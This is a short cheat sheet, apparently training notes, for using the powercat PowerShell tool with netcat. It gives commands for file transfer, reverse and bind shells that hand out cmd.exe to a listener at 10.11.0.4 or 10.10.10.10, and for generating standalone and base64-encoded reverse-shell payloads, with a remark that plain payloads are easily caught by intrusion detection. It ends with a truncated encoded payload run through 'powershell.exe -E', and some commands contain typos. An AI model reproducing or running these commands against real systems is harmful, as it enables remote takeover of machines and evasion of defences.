To load the script: > cd c:\Tools\practical_tools > . .\powercat.ps1 > powercat -h FILE TRANSFER: Kali listner: #nc -lvnp 443 > receiving_powercat.ps1 Win: >powercat -c 10.10.10.10 -p 443 -i C:\Tools\practical_tools\powercat.ps1 ---Then after a minute kill the netcat listener and check that the file was transmited. R_SHELL: Kali listner: #nc -lvp 443 > receiving_powercat.ps1 Win: >powercat -c 10.10.10.10 -p 443 -e cmd.exe BIND_SHELL: Win listener: >powercat -p -p 443 -e cmd.exe Lin connector: #nc -nv 10.10.10.10. 443 PAYLOADS: ---standalone kali listener: #nc -lvnp 443 win connect: > powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1 //g: generates payload and outputs to a file. Thes types of standalone payloads can be easily detected by IDS/IPS > ./reverseshell.ps1 -----encoded listener: #nc -lvnp 443 >powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell. ps1 //we then need to copy the contents from the generated file and use the -E with the pasted contents. > powershell.exe -E ZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAZQBhAG0AMQBfAFM AZQB0AHUAcAAKAHsACgAKACAAIAAgACAAcABhAHIAYQBtACgAJABGAHUAbgBjAFMAZQB0AHUAcABWAGEAcgBzA CkACgAgACAAIAAgACQAYwAsACQAbAAsACQAcAAsACQAdAAgAD0AIAAkAEYAdQBuAGMAUwBlAHQAdQBwAFYAYQB yAHMACgAgACAAIAAgAGkAZgAoACQAZwBsAG8AYgBhAGwAOgBWAGUAcgBiAG8AcwBlACkAewAkAFYAZQByAGIAb wBzAGUAIAA9ACAAJABUAHIAdQBlAH0ACgAgACAAIAAgACQARgB1AG4AYwBWAGEAcgBzACAAPQAgAEAAewB9AAo AIAAgACAAIABpAGYAKAAhACQAbAApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAJABGAHUAbgBjAFYAYQByA HMAWwAiAGwAIgBdACAAPQAgACQARgBhAGwAcwBlAAoAIAAgACAAIAAgACAAJABTAG8AYwBrAGUAdAAgAD0AIAB OAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAGMAc ABDAGwAaQBlAG4AdAAKACAAIAAgACA